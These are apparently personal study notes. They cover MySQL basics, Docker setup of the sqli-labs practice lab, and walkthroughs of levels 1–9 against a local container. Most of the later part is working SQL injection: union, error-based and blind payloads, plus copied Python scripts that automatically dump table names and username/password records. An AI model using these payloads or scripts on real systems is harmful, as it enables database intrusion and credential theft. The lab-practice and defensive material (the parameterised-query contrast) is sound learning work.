
Summer 2023 Study Notes, Week 1

🚬🚬🚬

MySQL Study Notes

Course: "MySQL Getting Started: basics video + hands-on databases, taught by Lao Du"

Study

Installation

Logging in

Following the video, double-clicking mysql.exe made the window flash and close. Fix: open the folder containing mysql.exe (C:\Program Files (x86)\MySQL\MySQL Server 5.5\bin) in a terminal/cmd and run mysql -uroot -proot. (Passing the password on the command line leaves it in the shell history and visible in the process list; mysql -uroot -p prompts for it instead.)

Units

Database (databases) -> table -> data/record = row, field = column

Common commands

Quit: exit
Show the MySQL server version: select version();

List databases: show databases;
Switch to a database: use test;
Show the current database: select database();
Create a database: create database xxx;

List the tables in the current database: show tables;

Cancel the statement being typed: \c

Statement categories

DQL (data query language)
select

DML (data manipulation language: operates on data)
insert  add
delete  remove
update  modify

DDL (data definition language: operates on table structure)
create  new, the equivalent of add
drop    delete
alter   modify

TCL (transaction control language)

DCL (data control language)

Importing a database

source path/to/file.sql
Note: the path must not contain non-ASCII (e.g. Chinese) characters.

Querying: select ...

Selecting fields
select field1(, field2, field3, ...) from table_name;
select * from table_name;   (all fields)

Aliasing a selected column
select field_name as alias from table_name;
e.g.:

Before
+---------------+
| yuanlaide     |
+---------------+
| test1         |
| test2         |
+---------------+
Query
select yuanlaide as `change` from table_name;
+------------+
| change     |
+------------+
| test1      |
| test2      |
+------------+

(The keyword as is optional. Note that change is a reserved word in MySQL, so as an alias it has to be quoted with backticks as shown; an unreserved alias such as newname needs no quoting.)

If the alias contains spaces, wrap it in single quotes.

A selected field can be used in an arithmetic expression.

View the structure of a table
desc table_name;

Conditional queries

Syntax:
select
    field1, field2, field3, ...
from
    table_name
where
    condition;

=          equal
<> or !=   not equal
<          less than
<=         less than or equal
>          greater than
>=         greater than or equal

and   both conditions must hold (and binds tighter than or)
or    either condition holds
in    matches any value in a list; equivalent to several or's (in is not a range, it takes concrete values)
like  pattern matching with % or _
      % matches any run of characters (including none)
      _ matches exactly one character
      (% and _ are special inside a pattern; to match them literally they must be escaped, e.g. \_)

between ... and ...   between two values, equivalent to >= and <=
e.g.:
select
    empno, ename, sal
from
    emp
where
    sal >= 2450 and sal <= 3000;
-----------------------------
select
    empno, ename, sal
from
    emp
where
    sal between 2450 and 3000;

is null       (NULL cannot be tested with =)
is not null

Sorting

select
    field1, field2, field3, ...
from
    table_name
order by
    sort_key;

(ascending by default)

Descending / ascending

select
    field1, field2, field3, ...
from
    table_name
order by
    sort_key desc/asc;

select
    ...
from
    ...
where
    ...
order by   (sorting runs after the where filter; of the clauses seen so far it is executed last)
    ...

Data processing functions (single-row functions)

lower        convert to lower case
upper        convert to upper case
substr       substring: substr(string, start_index [1-based], length)
length       length
trim         strip leading and trailing spaces
str_to_date  parse a string into a date
date_format  format a date
format       add thousands separators
round()      round to the nearest value
rand         generate a random number
ifnull       replace NULL with a concrete value (NULL in any arithmetic yields NULL)
concat       string concatenation
case .. when .. then .. when .. then .. else .. end

Aggregate functions (multi-row functions)

  1. Aggregate functions skip NULL automatically; there is no need to handle NULL beforehand.
  2. Aggregate functions cannot be used directly in a where clause.
  3. Aggregate functions can be combined with each other.
    count   count
    count(field): the number of rows where that field is not NULL.
    count(*): the total number of rows in the table (every row counts, NULLs included).
    sum     sum
    avg     average
    max     maximum
    min     minimum

Grouped queries

  1. where runs before grouping, so an aggregate function cannot appear after where.
  2. When a select statement has group by, the select list may contain only the grouping fields and aggregate functions, nothing else. (MySQL enforces this only when the ONLY_FULL_GROUP_BY SQL mode is on, the default since 5.7.5; older servers such as the 5.5 used above silently return an arbitrary value for any other column.)
  3. having filters the data after grouping. It cannot be used alone, cannot replace where, and must be combined with group by.
    A complete select statement looks like this:
    select fields
    from table_name
    where ...
    group by ...
    having ...    (exists only to filter grouped data; cannot appear on its own)
    order by ...
    Execution order:
    1. where filters the raw rows
    2. group by groups them
    3. having filters the groups
    4. select picks the output columns
    5. order by sorts

Removing duplicate rows from a result [distinct]

  1. The table itself is not modified; only the query result is de-duplicated.
  2. distinct may appear only once, in front of the whole field list (it applies to the combination of all listed fields).

Join queries

Querying across tables: several tables are joined to produce the result.
When two tables are joined with no condition at all, the number of result rows is the product of the two tables' row counts. This is the Cartesian product.
Avoid the Cartesian product by adding a join condition.
Efficiency: alias the tables.

Inner joins

Equi-join (the condition is an equality, hence the name)
Non-equi-join (the condition is not an equality)
Self-join

Outer joins

Left outer join (left join): left
Right outer join (right join): right

Multiple tables

select
    ...
from
    a
join
    b
on
    join condition between a and b
join
    c
on
    join condition between a and c
right join
    d
on
    join condition between a and d

Subqueries

A select statement nested inside another select statement

select
    ..(select)..
from
    ..(select)..
where
    ..(select)..

union: merging result sets

Both result sets must have the same number of columns.

limit: taking part of the result set

In MySQL, limit is applied after order by.

limit startIndex, length
startIndex is the starting offset, length is the number of rows.
The starting offset is 0-based.

select
    ...
from
    ...
where
    ...
group by
    ...
having
    ...
order by
    ...
limit
    ...

Execution order:
1. from
2. where
3. group by
4. having
5. select
6. order by
7. limit

Tables (create, drop, alter)

Creating a table

create table table_name(field1 type, field2 type, field3 type);

create table table_name(
    field1 type,
    field2 type,
    field3 type
);

Data types

varchar(n)
Variable-length string.
Fairly smart and space-saving: allocates space according to the actual length of the data.
(The course gives a maximum of 255; that limit applied before MySQL 5.0.3. Since then the maximum is 65,535 bytes, shared with the other columns of the row.)

Pro: saves space.
Con: space is allocated dynamically, so it is slower.

char(n) (max 255)
Fixed-length string.
Regardless of the actual data length, a fixed-size space is allocated.
Used carelessly it wastes space.

Pro: no dynamic allocation, so it is fast.
Con: can waste space if misused.
+------------------+
int
Integer, equivalent to Java's int (4 bytes). (The 11 in int(11) is only a display width, not a maximum length; it does not change the range of values that can be stored.)

bigint
Long integer, equivalent to Java's long.

float
Single-precision floating point

double
Double-precision floating point

date
Short date type (date only)

datetime
Long date type (date and time)

clob
Character large object (Character Large OBject).
Stores long text, for example an article or a description.
MySQL has no type literally named CLOB; its equivalents are text, mediumtext and longtext (longtext holds up to 4 GB). Use these when a string will not fit in varchar.

blob
Binary large object (Binary Large OBject).
Used for images, audio, video and other binary data.
Inserting into a BLOB column (an image, a video, ...) has to be done through an IO stream rather than as a literal in the SQL text.

Dropping a table (if it exists)
drop table [if exists] table_name;

Inserting data
insert into table_name(field1, field2, field3...) values(value1, value2, value3);

insert into t_user(id,name,birth,create_time) values
(1,'zs','1980-10-11',now()),
(2,'lisi','1981-10-11',now()),
(3,'wangwu','1982-10-11',now());

Dates

str_to_date
date_format
date
datetime       long
id             integer
name           string
birth          short date
create_time    time the record was created: long date type
MySQL short-date default format: %Y-%m-%d
MySQL long-date default format: %Y-%m-%d %H:%i:%s   (%H is the 24-hour hour; %h is the 12-hour hour)
now()          current system time (with hours, minutes and seconds: datetime type)


update table_name set field1=value1, field2=value2, field3=value3... where condition;
Without a where condition every row in the table is updated.


delete from table_name where condition;
Likewise, without a where condition every row in the table is deleted.

34 homework problems

  1. Aggregate functions and grouped queries
    select deptno,max(sal) as maxsal from emp group by deptno;

    select
        e.ename, t.*
    from
        emp e
    join
        (select deptno,max(sal) as maxsal from emp group by deptno) t
    on
        t.deptno = e.deptno and t.maxsal = e.sal;
  2. select deptno,avg(sal) as avgsal from emp group by deptno;

    select
        e.ename, t.*, e.sal
    from
        emp e
    join
        (select deptno,avg(sal) as avgsal from emp group by deptno) t
    on
        e.deptno = t.deptno and e.sal > t.avgsal;

Docker: installation, configuration, problems and fixes

Installation
No Hyper-V
Got the "install WSL2 kernel update" prompt

Setting up the target

  1. Run: docker info
    It prints a long wall of output plus

    WARNING: No blkio throttle.read_bps_device support
    WARNING: No blkio throttle.write_bps_device support
    WARNING: No blkio throttle.read_iops_device support
    WARNING: No blkio throttle.write_iops_device support

    Searched around: not important.

  2. Search for sqli-labs: docker search sqli-labs

  3. Pull the image: docker pull acgpiano/sqli-labs

  4. List local images: docker images

  5. Run the image: docker run -dt --name sqli-labs -p 80:80 --rm acgpiano/sqli-labs

Open http://127.0.0.1/ in the browser.

After a reboot, just start it again with
docker start sqli-labs

Two things to watch in that run command: --rm deletes the container as soon as it stops, so after a reboot docker start sqli-labs will report that no such container exists; drop --rm if the same container is to be started again later. And -p 80:80 binds the deliberately vulnerable lab on every interface of the host; -p 127.0.0.1:80:80 keeps it reachable only locally.

Problem: Unable to connect to the database: security
See the article "Fixing 'Unable to connect to the database: security' when running sqli-labs in Docker".

sqli-labs

Less-1

?id=1
?id=1'
?id=1' --+
?id=1' order by 3 --+
?id=1' order by 4 --+
?id=-1' union select 1,2,3--+
?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
?id=-1' union select 1,2,group_concat(username,id,password) from users--+

(order by 3 succeeds and order by 4 errors, so the query has three columns; id=-1 makes the original row set empty so the row produced by the union is what gets displayed; --+ becomes "-- " after URL decoding and comments out the rest of the original statement.)
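How the union payloads above turn the Less-1 query into a data leak, and why binding the value as a parameter stops it. This is an added example, not code from the post or from sqli-labs. sqlite3 is used as an offline stand-in for MySQL (an assumption), so string concatenation is written with || instead of concat() and group_concat() takes one argument; the users rows are constructed sample data, not the lab's real security database.

```python
import sqlite3


def make_db():
    """Constructed sample table (assumption); stands in for sqli-labs' security.users."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users(id INTEGER, username TEXT, password TEXT);"
        "INSERT INTO users VALUES (1,'Dumb','Dumb'),(2,'Angelina','I-kill-you');"
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """Less-1 shape: the parameter is spliced into the statement text, so a
    closing quote, a UNION and a comment terminator rewrite the query."""
    sql = "SELECT id, username, password FROM users WHERE id='%s' LIMIT 0,1" % user_id
    return conn.execute(sql).fetchone()


def lookup_parameterised(conn, user_id):
    """Hardened form: the statement text is fixed and the value is bound, so
    the same payload is merely compared against the id column as a string."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchone()


# Counterpart of  ?id=-1' union select 1,2,group_concat(username,id,password) from users--+
# written in sqlite syntax (|| for concat, single-argument group_concat).
UNION_PAYLOAD = "-1' union select 1,group_concat(username||':'||password),3 from users--+"


def demo():
    """Run the same payload through both lookups and return the three results."""
    conn = make_db()
    return {
        "normal": lookup_parameterised(conn, "1"),          # ordinary request
        "vulnerable": lookup_vulnerable(conn, UNION_PAYLOAD),   # leaks every user:password
        "parameterised": lookup_parameterised(conn, UNION_PAYLOAD),  # no row matches
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(name, row)
```

With the vulnerable lookup the returned row is (1, 'Dumb:Dumb,Angelina:I-kill-you', 3): the original WHERE matched nothing, the injected SELECT supplied the row, and the trailing LIMIT was commented away. With the bound parameter the whole payload is just a string that equals no id, so the lookup returns nothing.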

Less-2

Numeric injection (no quotes); otherwise the same as above.

Less-3

The value is wrapped in ('') instead of ''.
Replace ' with ') and the rest is the same.

Less-4

The value is wrapped in ("").
Replace ' with ") and the rest is the same.

Less-5

Boolean-based blind, with error feedback

?id=1'   produces an error
?id=1'--+
?id=1' and length((select database()))=8--+

I didn't want to inject by hand, so I copied someone else's code [https://www.cnblogs.com/cmx666/p/15119740.html]

import requests
import string

url = "http://127.0.0.1/Less-5/"

# Baseline: the page length for a true condition (id=1 exists)
normalHtmlLen = len(requests.get(url=url + "?id=1").text)

print("The len of HTML:" + str(normalHtmlLen))

dbNameLen = 0

# Database name length: the page keeps its normal length only when the injected condition is true
while True:
    dbNameLen_url = url + "?id=1'+and+length(database())=" + str(dbNameLen) + "--+"
    # print(dbNameLen_url)

    if len(requests.get(dbNameLen_url).text) == normalHtmlLen:
        print("The len of dbName:" + str(dbNameLen))
        break

    if dbNameLen == 30:
        print("Error!")
        break

    dbNameLen += 1

dbName = ""

# Database name: try each lowercase letter at each position (one request per candidate)
for i in range(1, dbNameLen + 1):
    for a in string.ascii_lowercase:
        dbName_url = url + "?id=1'+and+substr(database()," + str(i) + ",1)='" + a + "'--+"
        # print(dbName_url)
        if len(requests.get(dbName_url).text) == normalHtmlLen:
            dbName += a
            print(dbName)
            break

Then I added a quick table lookup (same imports and url as the script above):

import requests
import string

url = "http://127.0.0.1/Less-5/"

normalHtmlLen = len(requests.get(url=url + "?id=1").text)
print("The len of HTML: " + str(normalHtmlLen))

tableNameLen = 0

# Length of the first table name in the current database
while True:
    tableNameLen_url = url + "?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0, 1))=" + str(tableNameLen) + "--+"
    response = requests.get(tableNameLen_url)
    if response.status_code == 200 and len(response.text) == normalHtmlLen:
        print("The len of table name: " + str(tableNameLen))
        break

    if tableNameLen == 50:
        print("Error!")
        break

    tableNameLen += 1

tableName = ""

# Characters of that table name, one lowercase candidate per request
for i in range(1, tableNameLen + 1):
    for a in string.ascii_lowercase:
        tableName_url = url + "?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 0, 1)," + str(i) + ",1)='" + a + "'--+"
        response = requests.get(tableName_url)
        if response.status_code == 200 and len(response.text) == normalHtmlLen:
            tableName += a
            print(tableName)
            break

But then I remembered there is more than one table, so after asking ChatGPT (same imports and url as above):

import requests
import string

url = "http://127.0.0.1/Less-5/"

normalHtmlLen = len(requests.get(url=url + "?id=1").text)
print("The len of HTML: " + str(normalHtmlLen))

tableNames = []

tableIndex = 0

# Walk the tables with "limit tableIndex, 1"; once the offset is past the last table
# the subquery yields NULL, no length matches, and the inner loop hits 50, which ends the walk.
while True:
    tableNameLen = 0

    while True:
        tableNameLen_url = url + "?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit " + str(tableIndex) + ", 1))=" + str(tableNameLen) + "--+"
        response = requests.get(tableNameLen_url)
        if response.status_code == 200 and len(response.text) == normalHtmlLen:
            break

        if tableNameLen == 50:
            print("Error!")
            break

        tableNameLen += 1

    if tableNameLen == 50:
        break

    tableName = ""

    for i in range(1, tableNameLen + 1):
        for a in string.ascii_lowercase:
            tableName_url = url + "?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit " + str(tableIndex) + ", 1)," + str(i) + ",1)='" + a + "'--+"
            response = requests.get(tableName_url)
            if response.status_code == 200 and len(response.text) == normalHtmlLen:
                tableName += a
                break

    if tableName:
        tableNames.append(tableName)

    tableIndex += 1

print("Table names:")
for tableName in tableNames:
    print(tableName)

Column lookup (same imports and url as above):

import requests
import string

url = "http://127.0.0.1/Less-5/"

normalHtmlLen = len(requests.get(url=url + "?id=1").text)
print("The len of HTML: " + str(normalHtmlLen))

columnNames = []

tableIndex = 0

# Same walk as for tables, over the columns of the users table
while True:
    columnNameLen = 0

    while True:
        columnNameLen_url = url + "?id=1' and length((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit " + str(tableIndex) + ", 1))=" + str(columnNameLen) + "--+"
        response = requests.get(columnNameLen_url)
        if response.status_code == 200 and len(response.text) == normalHtmlLen:
            break

        if columnNameLen == 50:
            print("Error!")
            break

        columnNameLen += 1

    if columnNameLen == 50:
        break

    columnName = ""

    for i in range(1, columnNameLen + 1):
        for char in string.ascii_lowercase + string.digits:  # letters and digits
            # compare the ascii code rather than the character itself
            columnName_url = url + "?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit " + str(tableIndex) + ", 1)," + str(i) + ",1))=" + str(ord(char)) + "--+"
            response = requests.get(columnName_url)
            if response.status_code == 200 and len(response.text) == normalHtmlLen:
                columnName += char
                break

    if columnName:
        columnNames.append(columnName)

    tableIndex += 1

print("Column names in 'users' table:")
for columnName in columnNames:
    print(columnName)

Then I searched a bit more and found an especially good one:

import requests

db_name = ''
table_list = []
column_list = []
url = '''http://127.0.0.1/Less-5/?id=1'''
### current database name ###
# floor(rand(0)*2) error-based injection: the value we want is concatenated into the
# group-by key and comes back inside the "Duplicate entry ':value:1' for key 'group_key'" error.
print('Current database name:')
payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select database()),0x3a,floor(rand(0)*2)))--+'''
r = requests.get(url + payload)
db_name = r.text.split(':')[-2]
print('[+]' + db_name)
### table names ###
print('Tables in database %s:' % db_name)
for i in range(50):
    payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select table_name from information_schema.tables where table_schema='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (db_name, i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:  # past the last table: no duplicate-key error any more
        break
    table_name = r.text.split(':')[-2]
    table_list.append(table_name)
    print('[+]' + table_name)
### column names ###
#### the users table is used as the example here (it is the last table found) ####
print('Columns of table %s:' % table_list[-1])
for i in range(50):
    payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select column_name from information_schema.columns where table_name='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (table_list[-1], i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:
        break
    column_name = r.text.split(':')[-2]
    column_list.append(column_name)
    print('[+]' + column_name)
### field values ###
#### the username column is used as the example (second-to-last column of users: id, username, password) ####
print('Values of column %s:' % column_list[-2])
for i in range(50):
    payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (column_list[-2], db_name, table_list[-1], i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:
        break
    dump = r.text.split(':')[-2]
    print('[+]' + dump)


#### password ####
print('Values of column %s:' % column_list[-1])
for i in range(50):
    payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (column_list[-1], db_name, table_list[-1], i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:
        break
    dump = r.text.split(':')[-2]
    print('[+]' + dump)

But here's the thing... I've now realised this level can be solved with floor() error-based injection.
See the article "A detailed explanation of double-query injection".

?id=1' and(select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 1,1),floor(rand()*2)) as x from security.users group by x) as a)--+

Why this errors: while group by fills its temporary table, floor(rand()*2) is evaluated once to look up the key and again when the row is inserted, so the same key can be inserted twice and MySQL fails with "Duplicate entry '...' for key 'group_key'", echoing the concatenated value in the message. Unseeded rand() makes this happen only some of the time; rand(0) is deterministic (0,1,1,0,1,1,...) and fails reliably as long as the grouped set has at least three rows, which is why the script above uses it.

Less-6

Wrapped in " instead of '; otherwise the same as above.

import requests

db_name = ''
table_list = []
column_list = []
url = '''http://127.0.0.1/Less-6/?id=1'''
### current database name ###
print('Current database name:')
payload = '''" and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select database()),0x3a,floor(rand(0)*2)))--+'''
r = requests.get(url + payload)
db_name = r.text.split(':')[-2]
print('[+]' + db_name)
### table names ###
print('Tables in database %s:' % db_name)
for i in range(50):
    payload = '''" and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select table_name from information_schema.tables where table_schema='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (db_name, i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:
        break
    table_name = r.text.split(':')[-2]
    table_list.append(table_name)
    print('[+]' + table_name)
### column names ###
#### the users table is used as the example here ####
print('Columns of table %s:' % table_list[-1])
for i in range(50):
    payload = '''" and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select column_name from information_schema.columns where table_name='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (table_list[-1], i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:
        break
    column_name = r.text.split(':')[-2]
    column_list.append(column_name)
    print('[+]' + column_name)
### field values ###
#### the username column is used as the example ####
print('Values of column %s:' % column_list[-2])
for i in range(50):
    payload = '''" and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (column_list[-2], db_name, table_list[-1], i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:
        break
    dump = r.text.split(':')[-2]
    print('[+]' + dump)

#### password ####
print('Values of column %s:' % column_list[-1])
for i in range(50):
    payload = '''" and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (column_list[-1], db_name, table_list[-1], i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:
        break
    dump = r.text.split(':')[-2]
    print('[+]' + dump)

Less-7

Double parentheses... but the script wouldn't run. I saw "outfile" and planned to try writing a file, but it never succeeded.

Articles tried: "[Original] sqli-labs Less-7: the file cannot be written", "You don't have permission to save in this location", "The best fix for 'gpedit.msc not found'".
Couldn't find anything else on the problem, so I gave up.

For into outfile to work at all, the database account needs the FILE privilege, the server's secure_file_priv setting must permit the target directory (an empty value allows any directory, NULL disables file export completely; check with show variables like 'secure_file_priv'), and the directory must be writable by the mysqld process, which here runs inside the container. Windows-side permission and group-policy fixes do not change any of that.

Less-8

Blind injection: here it really comes.

import datetime
import re
import string

import requests


def time_tools(target_url, payload):
    # Whole seconds a request takes; used with sleep() to confirm a true condition
    start_time = datetime.datetime.now()
    response = requests.get(target_url + payload)
    end_time = datetime.datetime.now()
    sec = (end_time - start_time).seconds
    return sec


def get_database_length(target_url):
    # Time-based check of the database name length (1..9)
    for length in range(1, 10):
        payload = "?id=1' and if(length(database())={},sleep(1),0)--+".format(length)
        sec = time_tools(target_url, payload)
        if sec >= 1:
            print("Database length is {}".format(length))
            return length


def get_database_name(target_url):
    # Boolean check: "You are in..........." is only rendered when the condition is true
    db_name = ''
    db_length = get_database_length(target_url)
    letters = string.ascii_lowercase + "_"
    for i in range(1, db_length + 1):
        for letter in letters:
            payload = "?id=1' and substring(database(),{},1)='{}' --+".format(i, letter)
            html_content = requests.get(target_url + payload).text
            result = re.findall("You are in...........", html_content)
            if not result:
                continue
            else:
                db_name += letter
                break
    print("Database name is {}".format(db_name))
    return db_name


def get_table_name_length(target_url):
    """
    Tables, columns and records are all dumped the same way; once the tables are
    known, swap the payload to dump the rest.
    Records:
    "?id=1' and length((select concat(username,0x3a,password)from users limit {},1))={}--+"
    Columns:
    "?id=1' and length((select column_name from information_schema.columns " \
    "where table_schema=database() and table_name='users' limit {},1))={}--+"
    Tables:
    "?id=1' and length((select table_name from information_schema.tables " \
    "where table_schema=database() limit {},1))={}--+"
    """
    # As written, this dumps the length of each username:password row of users (up to 15 rows)
    table_name_length = []
    for i in range(15):
        for length in range(1, 50):
            payload = "?id=1' and length((select concat(username,0x3a,password)from users limit {},1))={}--+".format(i,
                                                                                                                  length)
            html_content = requests.get(target_url + payload).text
            result = re.findall("You are in...........", html_content)
            if result:
                table_name_length.append(length)
                # print(table_name_length)
                break
            else:
                continue
    return table_name_length


def get_table_name(target_url):
    """
    Tables and columns are dumped the same way; once the tables are known,
    swap the payload to dump the columns.
    """
    letters = string.ascii_lowercase + string.digits + '_:@-!'
    table_name = ''
    table_length = get_table_name_length(target_url)
    for length in range(0, len(table_length)):
        for i in range(1, table_length[length] + 1):
            for letter in letters:
                payload = "?id=1' and substring((select concat(username,0x3a,password)from users limit {},1),{},1)='{}'--+" \
                    .format(length, i, letter)
                html_content = requests.get(target_url + payload).text
                result = re.findall("You are in...........", html_content)
                if result:
                    table_name += letter
                    break
                else:
                    continue
        print("The injected data are {}".format(table_name))
        table_name += ','


if __name__ == '__main__':
    get_database_name("http://127.0.0.1/Less-8/")
    get_table_name("http://127.0.0.1/Less-8/")

Good stuff, copied it.

Less-9

Time-based blind, lol
sleep()

Found some code. Its advantage is that it is easy to adapt; its drawback is that it is slow... really slow. I went to eat an ice cream and it still hadn't finished when I came back.

#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2021/9/7 10:20
# @Author : AA8j
# @Site :
# @File : Time-based-blind-SQL-injection.py
# @Software: PyCharm
# @Blog : https://blog.csdn.net/qq_44874645
import requests
from fake_useragent import UserAgent


def get_tables(url, payload_header, payload_end):
    # Length of all table names in the current database, joined by group_concat
    length = 100
    for L in range(1, 1000):
        payload = url + payload_header + \
            "length((select group_concat(table_name) from information_schema.tables " \
            f"where table_schema=database()))={L}" + payload_end
        print(f'\rProbing length of the joined table names: {L}', end='')
        if judge_time(payload):
            print(f'\nLength of the joined table names: {L}', end='')
            length = L
            break
        elif L == 999:
            print(f'\rCould not determine the length of the joined table names; stopped at {L}', end='')
    print()

    # One character per position, scanning code points 39..122 (one timed request each)
    tables_name = ''
    for i in range(1, length + 1):
        print(f'\rFetching character {i}: {tables_name}', end='')
        for ascii_num in range(39, 123):
            payload = url + payload_header + \
                f"(select ascii(mid(group_concat(table_name),{i},1)) from information_schema.tables " \
                f"where table_schema=database())={ascii_num}" + payload_end
            if judge_time(payload):
                tables_name += chr(ascii_num)
                break  # stop scanning once the character is found
    tables_list = tables_name.split(',')
    print('\nFinished fetching table names:', end='')
    return tables_list


def get_columns(table_name, url, payload_header, payload_end):
    # The table name is sent as a hex literal (0x...) so the payload needs no quotes
    table_hex = table_name.encode("utf-8").hex()
    length = 1000
    for L in range(1, 10000):
        payload = url + payload_header + \
            "length((select group_concat(column_name) from information_schema.columns " \
            f"where table_schema=DATABASE() AND table_name=0x{table_hex}))={L}" + payload_end
        print(f'\rProbing length of the joined column names of {table_name}: {L}', end='')
        if judge_time(payload):
            print(f'\nLength of the joined column names of {table_name}: {L}', end='')
            length = L
            break
        elif L == 9999:
            print(f'\rCould not determine the length of the joined column names of {table_name}; stopped at {L}', end='')
    print()

    columns_name = ''
    for i in range(1, length + 1):
        print(f'\rFetching character {i}: {columns_name}', end='')
        for ascii_num in range(39, 123):
            payload = url + payload_header + \
                f"(select ascii(mid(group_concat(column_name),{i},1)) from information_schema.columns " \
                f"where table_schema=DATABASE() AND table_name=0x{table_hex})={ascii_num}" + payload_end
            if judge_time(payload):
                columns_name += chr(ascii_num)
                break
    columns_list = columns_name.split(',')
    print(f'\nFinished fetching the column names of {table_name}:', end='')
    return columns_list


def get_data(chose_table, column_list, url, payload_header, payload_end):
    # Build ",col1,col2,..." so that concat_ws(':' ,col1,col2,...) joins each row with ':'
    columns_name = ''
    for i in column_list:
        columns_name += f",{i}"

    # Length of all rows joined by group_concat (note: group_concat is capped by
    # group_concat_max_len, 1024 by default, so very large tables are truncated)
    length = 10000
    for L in range(1, 10000):
        payload = url + payload_header + \
            f"length((select group_concat(concat_ws(':'{columns_name})) from {chose_table}))={L}" \
            + payload_end
        print(f'\rProbing length of the joined records of {chose_table}: {L}', end='')
        if judge_time(payload):
            print(f'\nLength of the joined records of {chose_table}: {L}', end='')
            length = L
            break
        elif L == 9999:
            print(f'\rCould not determine the length of the joined records of {chose_table}; stopped at {L}', end='')

    print()
    data = []
    data_str = ''
    for i in range(1, length + 1):
        print(f'\rFetching character {i}: {data_str}', end='')
        for ascii_num in range(39, 123):
            payload = url + payload_header + \
                f"(select ascii(mid(group_concat(concat_ws(':'{columns_name})),{i},1)) from {chose_table})" \
                f"={ascii_num} " + payload_end
            if judge_time(payload):
                data_str += chr(ascii_num)
                break

    data_list = data_str.split(',')
    for i in data_list:
        data.append(i.split(':'))
    print(f'\nFinished fetching the records of {chose_table}:')
    return data


def judge_time(payload):
    # A response that took 3..5 s means sleep(3) ran, i.e. the condition was true
    time = html_get_time(payload)
    if 3 <= time < 6:
        return True
    else:
        return False


def html_get_time(url):
    # Whole seconds the request took; random User-Agent via the fake_useragent package
    req = requests.session()
    ua = UserAgent()
    headers = {'User-Agent': ua.random}
    timeout = 6
    response = req.get(url, headers=headers, timeout=timeout)
    return response.elapsed.seconds


def main():
    url = 'http://127.0.0.1/Less-9/?id=1'
    payload_header = "' and if("
    payload_end = ",sleep(3),1)--+"

    print('========Time-based-blind-SQL-injection==============')
    print('=====================By:AA8j========================')
    print('Target: ' + url)

    # ------------------------ tables -------------------------------
    tables_list = get_tables(url, payload_header, payload_end)
    # tables_list = ['emails', 'referers', 'uagents', 'users']
    for i in range(0, len(tables_list)):
        print(f'{i + 1}.{tables_list[i]}', end=' ')
    chose_table = tables_list[int(input('\nChoose the table whose columns to fetch: ')) - 1]

    # ------------------------ columns -----------------------------
    columns_list = get_columns(chose_table, url, payload_header, payload_end)
    # columns_list = ['id', 'username', 'password']
    for i in range(0, len(columns_list)):
        print(f'{i + 1}.{columns_list[i]}', end=' ')
    print()

    # ------------------------ records -----------------------------
    data = get_data(chose_table, columns_list, url, payload_header, payload_end)
    # data = [['1', 'Dumb', 'Dumb'], ['2', 'Angelina', 'I-kill-you'], ['3', 'Dummy', 'p@ssword']]
    for i in columns_list:
        print(i.ljust(20), end='')
    print('\n' + '-' * len(columns_list) * 20)
    for i in data:
        for j in i:
            print(j.ljust(20), end='')
        print('\n' + '-' * len(columns_list) * 20)


if __name__ == '__main__':
    main()
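All of the blind scripts above (Less-5, Less-8 and the Less-9 one) spend one request per candidate character, either over a fixed lowercase alphabet or over every code point from 39 to 122, which is why Less-9 takes so long and why a character outside the alphabet is silently missed. The added example below, which is not from the post or from the scripts it links, extracts the same kind of value with a binary search over the code point, about seven requests per character whatever the character is. The oracle is a local sqlite3 stand-in (an assumption) for the "page length unchanged" / "You are in..." / sleep() delay check, with constructed users rows; sqlite's unicode() plays the role of MySQL's ascii(). Against a real target every oracle call is one HTTP request, or one timed request for sleep()-based injection.

```python
import sqlite3

# Constructed sample rows (assumption), not the real sqli-labs 'security' database.
_CONN = sqlite3.connect(":memory:")
_CONN.executescript(
    "CREATE TABLE users(id INTEGER, username TEXT, password TEXT);"
    "INSERT INTO users VALUES (1,'Dumb','Dumb'),(2,'Angelina','I-kill-you'),(3,'Dummy','p@ssword');"
)
REQUESTS = 0  # oracle calls; each would be one HTTP request against a real target


def oracle(condition):
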